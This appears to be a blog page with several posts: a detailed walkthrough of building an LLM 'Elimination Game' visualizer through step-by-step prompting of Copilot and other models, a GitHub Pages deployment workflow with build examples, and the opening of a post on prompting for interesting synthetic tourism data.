Generate a fractal changed from a single Mandelbrot image to an explorer you can zoom, drag, and reset with sliders and the mouse wheel.
Generate a dashboard jumped from static charts to a live page with smooth card animations, modern fonts, and a real‑time stats box.
A few observations.
Models are getting much more reliable. Even a low cost model like GPT 4.1 Nano wrote error-free code in ~100 retries.
When pushed, they tend to brag. They attach grand titles like Ultimate Interactive Circle or Galactic Data Universe. They sin out flash descriptions like This dramatically upgraded clock features a pulsating neon glow, animated pulsing background glow, highly stylized tick marks, …
A simple prompt like Improve it can spark new ideas, revealing features such as:
SUMMARY: using LLMs and AI code editors make me a bit faster. It took me 7 hours instead of 10-12. But more importantly:
I procrastinate less. (“Oh, LLMs will make it easy.”)
I get stuck less. (“Oh, LLMs will know that.”)
I avoid ambitious designs less. (“Oh, LLMs will figure something out.”)
Also: GitHub Copilot is almost as good as Cursor at editing code, but slower at applying the edits. I’m perfectly happy recommending the free tier for beginners.
Here’s a breakdown of the process I followed, along with the most insightful lessons I learned.
Research usefulness
I usually visualize data for fun. But Naveen‘s pops into my head, asking, “But Anand, what’s the use of all this?” So, I asked O1-Pro: “What are ways in which this can help Straive push its AI business?”
Then I added my requirements (which took 10-15 minutes to think of.)
I would like to visualize each game interactively. The authors have created a visualization that looks like the image attached. I would like to do better. Specifically, I’d like to:
Allow the user to step through each stage or play each step in sequence, jumping to any step. (They should be able to link to any step as well.)
Show the game, round, sub-round prominently
Show what the model is saying or thinking NEXT to the model, making it easy to read
Show alliance proposals and rejections as they form, ideally moving the models around as they seek to pair up. Rejections and replacements should be clearly visible
Once alliances are formed, group models together
Clearly show the voting process: who voted to eliminate which which model, how many elimination votes has each model received
Clicking on each model should show all the model’s thoughts and messages up to that point
Keeping these in mind, suggest diverse ways to visualize each step of the game. The primary goal is to make the game easy to follow and understand and tell a GRIPPING, ENGAGING story about the politics of LLMs. Like a Survivor reality show.
I asked both O1 ProandGemini 2.5 Pro (exp) for visualization ideas. I liked Gemini’s better. For example, Gemini said,
“Private Conversations: Dim the main stage slightly. Highlight the currently conversing pair.
“Voting Booth Visualization: As each private_vote_reason appears, briefly show the voter’s avatar and their reason text (maybe in a “thought bubble” style) next to the target they intend to vote for.”
But O1 Pro gave me a few powerful ideas. The best was an alliance table:
“Create a table with columns representing each model, rows representing rounds. Each cell shows the ID of the ally that model allied with in that round. If it’s 3+ consecutive alliances, collapse them with a vertical line. If the model was eliminated or had no alliance, leave it blank or use a placeholder icon.”
Learnings:
💡 Ask LLMs for visualization ideas. They’ll suggest things you didn’t think of.
💡 Ask multiple LLMs. Each has a different style of thinking.
Prototype the visual
I stiched together pieces of the UI description and asked GPT 4o to create an image. This took 10-15 minutes. Private chat:
Here’s how I plan to visualize this.
Overall Interface & Navigation
Timeline Scrubber: A prominent timeline at the bottom or top, showing rounds and sub-rounds (conversations, pairing, voting, elimination). Users can click, drag, or use next/prev buttons to navigate. Each step should be linkable (e.g., using URL hashes). Add play/pause controls for auto-stepping.
Game State Dashboard: Always visible area showing: Game ID, Round, Sub-round, Players Remaining, Players Eliminated (Jury).
Central Stage Layout: Models represented as avatars (could be simple circles/icons or more thematic representations) arranged in a central area. Their positions and connections change based on game events.
1. Public Conversation (Round Start)
Talking Heads Circle: Arrange player avatars in a circle. When a player “speaks” (their message appears in the log):
Highlight their avatar.
Display their message in a speech bubble next to them.
Fade previous messages slightly or stack them briefly.
Engaging Element: Animate the avatar slightly (e.g., subtle pulse or glow) when they speak.
Chat Feed Style: A more traditional chat interface on one side, linked to avatars on the main stage. Clicking a message highlights the avatar and vice-versa.
Engaging Element: Use distinct colors or icons for each player avatar and their corresponding messages.
Proposal: An animated arrow or beam shoots from the proposer’s avatar to the target’s avatar. Display text like “P1 proposes to P6 (Rank 0)”.
Acceptance: The arrow solidifies, perhaps pulsing gently. A “Matched” icon appears.
Rejection: The arrow bounces off or shatters. A “Rejected” icon appears briefly.
Replacement: Show the existing accepted proposal being visually “bumped” or overridden by the new accepted one. Clearly label it “Replaced Px”.
Engaging Element: Physically move the avatars closer when a proposal is made, snapping them together when accepted, and pushing them apart on rejection. Use distinct sounds for proposal, acceptance, rejection, replacement.
Preference List Display: When hovering or clicking a player, show their ranked preference list as they build it during this phase. Highlight the status (proposed, accepted, rejected).
Final Pairs: Once preference_result occurs, rearrange the avatars so matched pairs are visually grouped together on the stage, perhaps connected by a clear line or within a shared bounding box.
3. Private Conversations (Paired Chats)
Private Chat Rooms: Dim the main stage slightly. Highlight the currently conversing pair. Display their private messages in separate chat windows or adjacent speech bubbles clearly linked to the pair.
Engaging Element: Use a “spotlight” effect on the active pair. Allow users to click other pairs to view their simultaneous conversations.
Connection Lines: Draw lines between the paired avatars during this phase. Clicking a line could bring up the conversation history for that pair in that round.
Engaging Element: Make the line pulse or glow when new messages are exchanged between the pair.
4. Voting (Reasons & Votes)
Voting Booth Visualization:
As each private_vote_reason appears, briefly show the voter’s avatar and their reason text (maybe in a “thought bubble” style) next to the target they intend to vote for.
As each vote occurs, draw a clear, perhaps slightly dramatic, animated arrow from the voter to the target avatar.
Vote Tally: Display a running count of votes received next to each player’s avatar (e.g., a red badge with the number). Increment this visibly as each vote comes in.
Engaging Element: Use a distinct color (e.g., red) for voting arrows. Add a subtle “target lock” animation on the player receiving a vote. Show if the vote was public or private (maybe different arrow styles).
5. Elimination
Spotlight & Fade: When the elimination event occurs:
Put a dramatic spotlight on the eliminated player.
Display the reason (tie-break, random pick if applicable).
Visually “grey out” or fade the eliminated player’s avatar and move them to a designated “Jury Box” area.
Engaging Element: A brief, dramatic animation or sound effect for elimination. Update the “Players Remaining/Eliminated” dashboard instantly.
6. Jury Speeches & Voting (Final Round)
Finalist Stage: Place the two finalists prominently center stage. Move the Jury avatars to a visible “Jury Box”.
Speech Display: As each finalist gives their speech (subround: 900), display it clearly next to their avatar, perhaps like a closing statement.
Jury Deliberation:
As each private_jury_reason appears, briefly highlight the juror and show their reasoning (maybe visible only on hover/click to avoid clutter).
Show jury votes accumulating for each finalist, similar to the elimination voting tally, but perhaps with a different visual style (e.g., gold stars).
Engaging Element: Build suspense by revealing jury votes one by one or after a short delay.
7. Final Results
Winner Announcement: A clear “Winner” banner or crown appears over the winning avatar.
Rank Display: Show the final ranks clearly, perhaps arranging avatars on a podium or listing them with their rank and partial points.
Game Summary: Offer a summary view showing key stats or moments from the game.
Interactivity (Clicking on Models)
Player Dossier: Clicking any avatar (active or jury) should open a panel or overlay showing:
Player ID & Model Type.
Their full message history (public and private, filterable by round/type).
Their voting history (who they voted for, who voted for them).
Their alliance history (proposals made/received, final pairs).
Their final rank/status.
Engaging Element: Use this panel to show hidden information like private_vote_reason after the vote has occurred.
Draw the user interface for this EXACTLY as it would appear on the screen.
Here’s the prototype it created.
Based on this, I drew out my own, revised, visual:
Learnings:
💡 LLMs can create visual prototypes. ChatGPT’s new 4o image generation converted the description into an acceptable image. Needs to improve, but enough to ideate.
💡 Improving is less work than creating. I rarely sketch visualizations. (Too lazy.) But since this prototype was there, and had some parts that were WRONG, I just had to fix it! 🙂
Break down the task
I then described the application to O1 Pro break down this task. Private chat
The URL looks like /#?game=286&line=4 indicating that game 286.jsonl must be loaded and line 4 is the current step we’re in.
The navbar has:
An app title
A game state dashboard with the game number (dropdown), round (number), stage (e.g. voting, alliances, etc.), players (number of players still active)
A timeline scrubber (a range slider) allowing users to jump to the specific line. This changes the URL which then triggers a change in app state.
A light/dark theme picker
The stage on the left as a set of models arranged in a circle. Each model/player has a unique and distinct color, a number inside it indicating the player number, a label above it indicating the model name (e.g. GPT-4o), a set of red dots below it when it receives an elimination vote, an arrow pointing from one model to another when a model talks to, plans an alliance with, or votes to eliminate another model. The arrow color depends on the action. When a model performs any action (speaking publicly / privately, voting, allying, etc.) the conversation or action summary is displayed in a semi-transparent overlay at the center of the circle. Eliminated models are shown with a 10% opacity. Allied models are redrawn next to each other with a line connecting them.
The sidebar on the right has 3 collapsible sections.
CHAT: Shows the history of each model’s public or private conversations. Each conversation begins with a circle with the model/player number in the same color as on the stage, followed by the model name. For private conversations, this is followed by an arrow pointing to the target model/player’s numbered & colored circle. This is followed by the text of the conversation. Private conversations are in a light red background.
ALLIANCES. This is a tabular representation where columns are models that form an alliance. Each row represents a round. The cells contain the model the model in the column header allied with. All models are numbered and colored. If a model in the column header was eliminated, the cell is empty. If it did not ally, the cell shows an empty grey circle. If 3+ consecutive cells show the same model in a column (i.e. the model did not switch alliances), we can replace the middle cells with a vertical line.
ELIMINATIONS. This tabular representation works exactly the same way as alliances, except it captures eliminations. Each column represents a model that voted for elimination. Each row represents a round. The cell contains the model the model in the column header voted to eliminate. All models are numbered and colored. If a model in the column header was eliminated, the cell is empty. If 3+ consecutive cells show the same model in a column (i.e. a model consistently voted against the same model), we can replace the middle cells with a vertical line.
I’d like to use an AI code generator to generate this visualization. Giving the entire spec at once is too much for it to build. I’d like to see the output step by step as well and propose changes. How might I break up this task?
Here’s its (rather good) breakdown:
Plan Your Data Structures
Basic Backend/Server Setup (If Needed)
Minimal Front-End with a Single View
Implement the Timeline Scrubber & URL Sync
Core Stage Visualization (Circle of Players)
Arrow/Line Visualization for Actions
Sidebar 1: CHAT Section
Sidebar 2: ALLIANCES Section
Sidebar 3: ELIMINATIONS Section
Refinements, Theming, & Final Touches
Learnings:
💡 Ask LLMs to break down your task. Its breakdown was better than mine.
To document my workflow, I decided to commit each stage of progress. At this point, I made the first commit to the repo documenting the process so far.
I skipped Step 1 (my mistake – I was forced to do it later) and didn’t need Step 2 (Backend/Server). So I began scaffolding, i.e. Step 3: Minimal Front-End with a Single View.
Create an index.html using Bootstrap via CDN. Scaffold it with a navbar
The navbar has:
An app title (Elimination Game)
A game state dashboard with the Game (dropdown), Round (number), Stage (e.g. voting, alliances, etc.), and Players (number of players still active)
A timeline scrubber (a range slider) allowing users to jump to the specific line. This changes the URL which then triggers a change in app state.
A light/dark theme picker. Here is the code for the theme picker. Use the same CDN links overall
<!-- Include Bootstrap 5.3+ and Bootstrap icons -->
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/css/bootstrap.min.css" rel="stylesheet">
<link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.css" rel="stylesheet">
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/js/bootstrap.bundle.min.js"></script>
<nav class="navbar navbar-expand-lg bg-body-tertiary">
<div class="container-fluid">
<a class="navbar-brand" href="#">Navbar</a>
<!-- Copy this dropdown anywhere in your page, e.g. inside a navbar -->
<div class="position-relative" role="group" aria-label="Toggle dark mode" title="Toggle Dark Mode">
<button class="dark-theme-toggle btn btn-primary dropdown-toggle" type="button" data-bs-toggle="dropdown" aria-expanded="false" aria-label="Open navigation menu">
<i class="bi bi-circle-half"></i> <span class="d-lg-none ms-2">Toggle theme</span>
</button>
<ul class="dropdown-menu dropdown-menu-end">
<li><button class="dropdown-item" data-bs-theme-value="light"><i class="me-2 bi bi-sun-fill"></i> Light</button></li>
<li><button class="dropdown-item" data-bs-theme-value="dark"><i class="me-2 bi bi-moon-stars-fill"></i> Dark</button></li>
<li><button class="dropdown-item" data-bs-theme-value="auto"><i class="me-2 bi bi-circle-half"></i> Auto</button></li>
</ul>
</div>
</div>
</nav>
Below the navbar is a section with a stage on the left and sidebar on the right. The stageon the left will contain a large responsive square SVG. The sidebar on the right contains 3 collapsible cards: Chat, Alliances, Eliminations.
It generated this scaffolding.
Learnings:
💡 Claude 3.5 Sonnet remains an excellent model to generate UI. Claude 3.7 Sonnet is even better, but is not currently available in the free Copilot subscription.
💡 Coders micro-manage LLMs. I think a novice will be more efficient and get better results than me. For example:
Did I need to give it the code snippet? Could I have given it a link?
Did I need to say “a range slider” or specify that Round must be a “number”, etc? Could it have inferred?
I gave some feedback on the scaffolding and asked for improvements.
Make the navbar always dark
The sidebar cards must be independently collapsible
For the Game, Round, Stage, and Players, show the label above the value. The label must be small and the value must be large.
Use only me-* margins on the navbar to ensure that there is no left margin mis-aligning the elements at low width. Also place the elements inside a collapsible navbar section at low widths
The stage must have a bottom margin to avoid touching the sidebar’s top on low-width screens
This was the result:
That prompted more feedback from me:
Prefer Bootstrap classes over <style> wherever possible.
Style the “Game” to look exactly like the round, stage, and players. The size of the label and value should match for all 4 elements perfectly.
Ensure that the labels round, stage, players will be visible in light mode against the dark navbar.
At this point, I made 3 manual edits because I felt I could do these better than the LLM:
Broke the “Elimination Game” in the navbar into 2 lines
Replaced fs-5 with fs-4 to get the values have the exact same size, and removed redundant styling on the game selection
Format document with HTML Language Features
Learnings:
💡 Experienced coders are good with feedback. It took me under 10 seconds to spot each problem in the output and code. Writing the feedback felt natural.
💡 Experienced coders need retraining to instruct rather than code. My instinct was to code immediately rather than to prompt.
As soon as I thought of one feedback, I had to fight the urge to fix it and write the feedback instead.
Even when instructing was easier, I chose to code it. e.g. breaking the “Eliminination Game” in the navbar into 2 lines,
Coding can be better if you don’t know what to do. I toggled the font size between fs-4 and fs-5 in rapid succession to figure out the right size.
But I could have experimented by asking the LLM to build a font size toggle or slider!
💡 LLMs could turn coders into good lead developers or managers. Pity.
On to Step 4: Implement the Timeline Scrubber & URL Sync.
I copied a few logs into a temporary logs/ folder and said:
Create a script.js as an ES module and include it from index.html.
On load, fetch logs/index.txt which contains all log files (*.jsonl), one per line.
The files are formatted as *_TIMESTAMP_YYYYMMDD_HHMMSS.jsonl.
Populate the game dropdown with these values. The option label should look like 25 Jan 2025, 10:30.
The default value for the game dropdown should be empty.
When the game dropdown changes to a non-empty option, fetch the file from logs/[filename] and store it in the global game, parsing the JSONL into an array of objects.
Set the maximum value of the range slider to the length of game.
When the range slider changes or the game dropdown changes, change the URL hash to #?game=[filename]&step=[range-slider-value] without modifying browser history.
When the URL hash changes through any means, call redraw(step) which will draw the current (global) game state at the step specified. For now, just display the step prominently on the stage.
This code worked fine but I like refactoring, so I tried to condense the 111 line code:
Shorten and simplify the code in script.js to be elegant.
User browser functionality more.
For example, use Intl to format dates.
Change the innerHTML of #gameSelect to concisely update the options.
Remove redundant braces, e.g. for single-line blocks.
That brought it down to 74 lines but failed to populate the select dropdown. Rather than debug, I undid the change (Copilot’s Undo feature is cool!) and tried:
Shorten and simplify the code in script.js to be elegant.
User browser functionality more, e.g. use Intl to format dates.
Prefer insertAdjacentHTML and replaceChildren.
Remove redundant braces, e.g. for single-line blocks.
This led to shorter code (69 lines) but still had the same issue. I had to manually correct this line:
// BEFORE
const [_, date, time] = filename.match(/_(\d{8})_(\d{6})/)?.groups ?? [];
// AFTER
const [_, date, time] = filename.match(/_(\d{8})_(\d{6})/) ?? [];
I also
Removed an incorrect px-2 against #gameSelect in index.html.
Decided to use the GitHub CDN and replaced fetch(logs/...) with fetch(https://raw.githubusercontent.com/sanand0/elimination_game/refs/heads/main/logs/...).
Also moved logs/index.txt into logs.txt and changed script.js accordingly
Formatted script.js with Prettier
Visually, nothing changes in a big way but the slider and the dropdown change the URL properly.
Learnings:
💡 Experienced coders suggest precise code improvements. Generally good ones. Like:
“use Intl to format dates”
“Prefer insertAdjacentHTML and replaceChildren” (over document.createElement)
💡 LLMs are good at refactoring. When I asked it to “Shorten and simplify the code in script.js to be elegant”, it reduced the code from 111 lines to 74 lines quite well!
💡 Redo if you don’t like it. Copilot’s “Undo” feature lets you retry until you get it right. Like in Edge of Tomorrow.
At this point, I needed a good data structure and felt the error in skipping Step 1. But, rather than creating one, I asked ChatGPT:
I would like the game structure to be held in a simple JS object called game. What data structure would help the most in drawing this visual such that it will require very little code (since required information is in this data structure)?
O1 Pro said:
A very convenient way to minimize front-end logic is to store a “timeline of snapshots”: each step in the game has both the event (what just happened) and a “current state” (the entire world after that event). Then, in your UI, you simply pick the snapshot that corresponds to the current line (based on the timeline scrubber) and draw exactly what’s in that snapshot—no extra derivation needed.
This is a brilliant idea. I rarely use this since I’m biased against wasting memory. But in this case, it’s perfect.
Based on that input, I prompted CoPilot:
In script.js, instead of loading the .jsonl into game, create this data structure to make it easy to visualize each step.
Use the sample .jsonl provided to infer the logic for this.
const game = {
game: "...",
players: {
"P1": {
"id": "Player2_Game1739872030683891_deepseek-fireworks", // from .player_id
"model": "deepseek-fireworks", // everything after the last underscore
},
// and so on for all other players
},
// For each line, create a step
steps: [
{
step: 0,
// Current round and subround
round: 1,
subround: 1,
event: {
// Contents of the original line
},
// list active alliances
active: { "P1": true, "P2": false, ... }
// For each round so far, list who allied with who, e.g.:
alliances: [ {"P1": "P6", "P2": "P7", ...}, ... ],
// // For each round so far, list who voted to eliminate whom, e.g.
votes: [ {"P1": "P4", "P2": "P1", ... }, ... ],
},
// …and so on, for each line in the JSONL
]
};
This worked almost perfectly. I made these edits:
Add let currentAlliances = {}; let currentVotes = {}; which it forgot in the code.
Re-apply change #2 I made manually in the last iteration (replacing the URL with the GitHub CDN). That change was not there in the chat window, Copilot did not pick it up.
Learnings:
💡 Coders mess up LLMs. Data structure was the first step the LLM recommended. I skip it. It proved crucial. LLMs do better than LLMs + coders – or doctors.
💡 LLMs can make basic mistakes. Like forgetting to declare variables.
Sidebar 2 & 3: ALLIANCES and ELIMINATIONS Sections
I jumped a bit to Steps 8 & 9. They were easier (just tables) and the visual components are independent, so order doesn’t matter.
There are always 8 players. Pick 8 visually distinct dark colors (i.e. on which white will look good as a foreground) as colors: {P1: "#...", P2: ...}.
In the alliances and eliminations cards, draw a table each as follows. The table header is:
| Round | P1 | P2 | P3 | … | P8 |
Instead of P1, P2, etc. draw a badge with background-color based on colors and text as 1 for P1, etc.
steps[step].alliances is a list like [{P1: P7, P2: P3, …}, …]. Render each row as a list like:
| 1 | P7 | P3 | … |
The cell contents are badges exactly like the header. If a player (e.g. P3) does not have an alliance, i.e. steps[step].alliances[round].P3 is missing, leave it blank. If steps[step].active[P3] is false, grey the cell background.
steps[step].votes is almost identical, listing the elimination votes. Populate this in the eliminations card.
Reuse code for this. Write VERY concise code. Use Bootstrap classes as much as possible.
This worked perfectly. I manually made one correction to an earlier mistake I noticed:
Replace slider.max = game.steps.length; with slider.max = game.steps.length - 1;
I decided to tweak this to show eliminated players clearly:
Replace the active data structure with eliminated. eliminated[“P1”] = 3 if P1 was eliminated at the end of round 3. eliminated[“P1”] is undefined if P1 is not eliminated.
Using this, in the alliances and elimination tables, color the cells grey only if the player was eliminated BEFORE that round. (We’ll find that only empty cells will be colored grey.)
Again, nearly perfect. I made one manual correction in the logic:
Replace game.steps[step].eliminated[p] <= i + 1 with game.steps[step].eliminated[p] < i + 1
Learnings:
💡 When all goes well, LLMs are surprisingly effective when they do things right. Normally, this step take me half an hour. Now, it took under 5 minutes.
💡 Watch out for subtle bugs. The change in operator (from “<=” to “<”) almost went unnoticed, but makes a big difference on when a player was eliminated.
For each step, based on step[].event.type, populate the Chat section with the history of conversations so far:
conversation: This is a public conversation. Show ${event.player_id} ${event.message} with the player ID shown like the badge above. player_id needs to be looked up from game.players since it matches game.players[*].id.
private: This is a private conversation. Show ${event.speaker_id} 🢂 ${event.target_id} ${event.message} with the speaker and target IDs treated as above.
preference_proposal: This is an alliance proposal. Show ${event.proposer} 😍 ${event.target} #${event.rank_of_target}. proposer and target are like “P1”, “P2”, etc.
preference_outcome: This is the outcome of a proposal. Show ${event.target} ❌ ${event.rejected} if event.rejected else ${event.target} ❤️ ${event.accepted} ❌ ${event.replaced} if event.replaced else ${event.target} ❤️ ${event.accepted}. All these are like “P1”, “P2”, etc.
preference_result: This is the outcome of the entire proposal round. Just show “Alliances formed”
private_vote_reason: This is the reason a player gives to eliminate someone. Show ${event.voter_id} 👎 ${event.target_id} ${event.reason}. voter_id and target_id match game.players[*].id
private_revote_reason: Show Same as above
private_jury_reason: Show same as above.
vote: This is the actual vote. Show ${event.voter_id} 👎 ${event.target_id} like above
elimination: Just show “Elimination starts”
final_results: Show Winners: ${winners} where winners is a list of players like [“P5”]
ALL players should be shown as a colored badge with a number. The chat card height should not exceed 15em. Overflow should scroll beyond that. Make sure the chat rendering is elegant. I’ve mentioned the content, but please use any Bootstrap UI component to make the chat more attractive.
Use lit-html to render efficiently. Import it via:
import { render, html } from “https://cdn.jsdelivr.net/npm/lit-html@3/+esm”;
Rewrite existing code inside redraw(), drawTable, drawBadge to use lit-html.
This worked perfectly.
Learnings:
💡 Careful and detailed prompting gets excellent results. I explained how to render each conversation type. That took time. But it helped build a reasonably complex visual in a single shot.
💡 LLMs are good at refactoring. It switched code from vanilla JS to lit-html templating like a pro.
Set the number of active players using len(game.players) – len(game.steps[].eliminated)
This worked perfectly. Then:
Update index.html and script.js to modify the sidebar as follows:
Keep the sidebar sections for chat, alliances and eliminations open by default.
Right align the “Round” column numbers in the alliances and eliminations tables.
Change the “Round” header to “#”
Rename the eliminations card section title to “Voting”
EVERY player badge should show game.players[P1/P2/…].model as a Bootstrap tooltip.
Add Bootstrap tooltips for the emojis
😍: proposed to
❌: rejected
❤️: accepted
👎: eliminated
Don’t indent or shade the chats that are currently indented and shaded (e.g. vote_reason).
If possible, beautify the chats further using Bootstrap classes.
This worked perfectly too.
Learnings:
💡 LLMs will get confused with long instructions and/or codebases. It took 5 failed attempts before I split the prompts. Keep your prompts cohesive. Keep your code bases modular.
Now for the most complex visual of the lot. Step 5: Core Stage Visualization (Circle of Players) and Step 6: 6. Arrow/Line Visualization for Actions.
Generate a square, responsive SVG in game stage using Bootstrap.
Import svg from lit-html and use svg where required.
It contains all players laid out in a circle.
Each player is a circle colored based on the player colors.
It contains the player number (1, 2, …) as text inside it in white.
Above the player circle, the player model is visible.
Leave plenty of space for a “center text” at the center of the circle that will contain centered text.
The text may be a full paragraph, so handle the font size and circle size accordingly.
The center text must have elegant rounded corners, and a background rgba(var(–bs-body-color-rgb), 0.1).
We need word wrapping, so use foreignElement to wrap a div which holds the text.
For each step, based on step[].event.type, draw the stage as follows:
conversation: Highlight (via a semi-transparent circle 2-3X the radius of the player) the player to highlight them. Show event.message in the center text.
private: Highlight players event.speaker_id. Draw an black arrow to event.target_id. Show event.message in the center text.
preference_proposal: Yellow arrow from event.proposer to event.target. Center text shows [MODEL NAME 1] proposes to [MODEL NAME 2] where model name is what’s in the tooltip
preference_outcome: (all items in [BRACKETS] are the model name shown in the tooltip)
If event.rejected, red arrow from event.target to event.rejected. Center text: [TARGET] rejects [REJECTED]
If event.replaced, green arrow from event.target to event.accepted and red arrow from event.target to event.replaced. Center text: [TARGET] accepts [ACCEPTED] replacing [REPLACED]
Else: green arrow from event.target to event.accepted. Center text: [TARGET] accepts [ACCEPTED] replacing [REPLACED]
preference_result: Center text shows “Alliances formed”
private_vote_reason: Purple arrow from event.voter_id to event.target_id. Center text: [VOTER_ID] thinks to eliminate [TARGET_ID]: event.reason
private_revote_reason: Show Same as above
private_jury_reason: Show same as above.
vote: Purple arrow from event.voter_id to event.target_id. Center text: [VOTER_ID] voted against [TARGET_ID]
elimination: Center text: “Elimination starts”
final_results: Center text: Show Winners: ${winners} where winners is a list of players like [“P5”]
This nearly worked. I made to UI edits:
Add a width="1000" to the SVG to get a minimim size
Add a font-size: 0.7rem; to the text container so the text will fit
Once I saw the output, I found a bunch of things I wanted to fix or improve:
The model name may contain underscores. So use everything after the second underscore, then replace all underscores with hyphens.
Render eliminated players with an opacity of 0.05, not 0.2.
Move the arrow head to the center of the arrow, not the end, to avoid getting hidden by the player circles.
Center all cells in the alliances and voting tables.
When the page is loaded, check the step as well and render that step.
Clicking on any chat entry should change the URL #?step= to that entry’s step
That worked well. I made a few manual edits:
Fix winner formatting by replacing getModelName(w) with game.players[w].model and playerBadge(w) with badge(w)
Setting the step on page load in the UI: document.getElementById("timelineScrubber").value = step;
- In the alliances and voting tables, make the table header stand out with a contrasting color.
- In the center text message, begin with a <h6> mentioning the speaker or initiator
Learnings:
💡 Write thoughts as precisely as code. This prompt took me considerable time — but not effort, since I was writing out my thoughts.
Given my practice, my thoughts are reasonably close to code (e.g. “We need word wrapping, so use foreignElement”)
But thinking in English lets me to think faster, jump in any order, and even make occasional mistakes
Show the votes against a player live on the voting table by changing votes: [...roundVotes] to votes: [...roundVotes, {...currentVotes}]
Change the voting arrow color from "purple" to "red"
Added updateHash(gameFile, step); on startup
Replaced the minimum step from 1 to 0
Then I prompted:
- Change all model names in the center text to the badges
- At every step, show all votes against a model via thin 50% transparent red arrows from key to value in game.steps[step].votes.at(-1) object which will look like {P1: "P2", ...}
💡 Coders want to code. After a few hours of telling Copilot in great detail what I want it to do, I just want to do it myself. Thinking is too hard. Coding is easier.
💡 Tiny changes are easier to code than to prompt. Especially for experienced coders.
Add documentation
Finally, I updated the docs.
Add README.md explaining the process, with screenshots (partly with LLM help)
Update home page with scary quotes from LLMs (mostly with LLM help)
Zoom the gameplay a bit for better visibility (manually)
Ensure hash changes update the visual robustly (partly with LLM help)
Then I had it update the home page with instructions:
Using #file:gameplay.webp and #file:quotes.js and #file:script.js update the usage in #file:index.html to provide clear, CONCISE information about all the features in this app and how to use them. Don't miss out any feature.
Improve the look and feel of these instructions. For example, add icons, colors, arrow key icons, etc. to make it look more visually attractive and engaging. Also, replace the title "Usage" with something more actionable. Make this section stand out SUBTLY.
Lessons
In summary, here’s what I learned (with learning categories identified by DeepSeek R1):
Always use LLMs to brainstorm (even if you know it)
💡 Ask LLMs why something is useful. You’ll invariably find plausible uses, even if you’re doing it just for fun.
💡 Ask LLMs for visualization ideas. They’ll suggest things you didn’t think of.
💡 Ask LLMs to break down your task. Its breakdown was better than mine.
💡 Ask multiple LLMs. Each has a different style of thinking.
Prototype with LLMs for speed
💡 LLMs can create visual prototypes. ChatGPT’s new 4o image generation converted the description into an acceptable image. Needs to improve, but enough to ideate.
💡 Improving is less work than creating. I rarely sketch visualizations. (Too lazy.) But since this prototype was there, and had some parts that were WRONG, I just had to fix it! 🙂
💡 Redo if you don’t like it. Copilot’s “Undo” feature lets you retry until you get it right. Like in Edge of Tomorrow.
LLMs are excellent coders
💡 LLMs are good at refactoring. It switched code from vanilla JS to lit-html templating like a pro.
💡 When all goes well, LLMs are surprisingly effective when they do things right. Normally, this step take me half an hour. Now, it took under 5 minutes.
💡 Claude 3.5 Sonnet remains an excellent model to generate UI. Claude 3.7 Sonnet is even better, but is not currently available in the free Copilot subscription.
But LLMs aren’t infallible
💡 LLMs can make basic mistakes. Like forgetting to declare variables.
💡 Watch out for subtle bugs. The change in operator (from “<=” to “<”) almost went unnoticed, but makes a big difference on when a player was eliminated.
💡 Tiny changes are easier to code than to prompt. Especially for experienced coders.
Careful prompting goes a long way
💡 LLMs will get confused with long instructions and/or codebases. It took 5 failed attempts before I split the prompts. Keep your prompts cohesive. Keep your code bases modular.
💡 Write thoughts as precisely as code. This prompt took me considerable time — but not effort, since I was writing out my thoughts.
💡 Careful and detailed prompting gets excellent results. I explained how to render each conversation type. That took time. But it helped build a reasonably complex visual in a single shot.
Coders need to re-learn coding but do have advantages
💡 Coders want to code. After a few hours of telling Copilot in great detail what I want it to do, I just want to do it myself. Thinking is too hard. Coding is easier.
💡 Coders mess up LLMs. Data structure was the first step the LLM recommended. I skip it. It proved crucial. LLMs do better than LLMs + coders – or doctors.
💡 Coders micro-manage LLMs. I think a novice will be more efficient and get better results than me. For example:
💡 Experienced coders need retraining to instruct rather than code. My instinct was to code immediately rather than to prompt.
💡 Experienced coders are good with feedback. It took me under 10 seconds to spot each problem in the output and code.
💡 Experienced coders suggest precise code improvements. Generally good ones. Like:
💡 LLMs could turn coders into good lead developers or managers. Pity.
name: Deploy to GitHub Pages
on:
# Run when pushed. Use { branches: [main, master] } to run only on specific branches
push:
# Allow manual triggering of the workflow
workflow_dispatch:
# OPTIONAL: Run at a specific cron schedule, e.g. first day of every month at 12:00 UTC (noon)
schedule:
- cron: "0 12 1 * *"
permissions:
# To deploy to GitHub Pages
pages: write
# To verify that deployment originated from the right source
id-token: write
jobs:
# Run as a single build + deploy job to reduce setup time
deploy:
# Specify the deployment environment. Displays the URL in the GitHub Actions UI
environment:
name: github-pages
url: ${{ steps.deployment.outputs.page_url }}
# Run on the latest Ubuntu LTS
runs-on: ubuntu-latest
steps:
# Checkout the repository
- uses: actions/checkout@v4
# Run whatever commands you want
- run: echo '<h1>Hello World</h1>' > index.html
# Upload a specific page to GitHub Pages. Defaults to _site
- uses: actions/upload-pages-artifact@v3
with:
path: .
# Deploy the built site to GitHub Pages. The `id:` is required to show the URL in the GitHub Actions UI
- id: deployment
uses: actions/deploy-pages@v4
This combines build and deploy jobs. For simple sites, that’s simpler and more efficient. For complex builds with parallel execution or need for better error recovery, multiple jobs will help.
I build sites with uv, node, or deno. Here are examples of each
# Install node
- uses: actions/setup-node@v4
with:
node-version: 20
registry-url: https://npm.pkg.github.com/
# Install and build via package.json
- run: npm install
- run: npm run build
# Or, directly use npx. For example, generate HTML with Marp
- run: npx -y @marp-team/marp-cli@latest README.md -o index.html
# Update content directly, e.g. add an SVG favicon as a data URL
- run: sed -i 's/<\/head>/<link rel="icon" type="image\/svg+xml" href="data:image\/svg+xml;base64,..."\/><\/head>/g' index.html
Generate realistic fake tourism data using these columns:
- Age
- Nationality
- Gender
- Income
- Booking_Channel
- Month
- Occupancy_Rate
- Travel_Frequency
- Spending
Run the code and let me download the output as a CSV file.
… the output is remarkably boring.
Men & women from all countries and ages in every month visit equally.
Income and spending are uniformly distributed – and the same pattern holds for all countries and ages.
Often, I need to generate fake data that is interesting. Specifically, I need data that can be used to illustrate a point or show a pattern.
Instead, we could ask for something different. ChatGPT
I want to generate realistic fake tourism data using these columns:
- Age
- Nationality
- Gender
- Income
- Booking_Channel
- Month
- Occupancy_Rate
- Travel_Frequency
- Spending
Do it as follows:
STEP 1. Given such data, generate 5 hypotheses on that a tourism department might test to increase tourist spend.
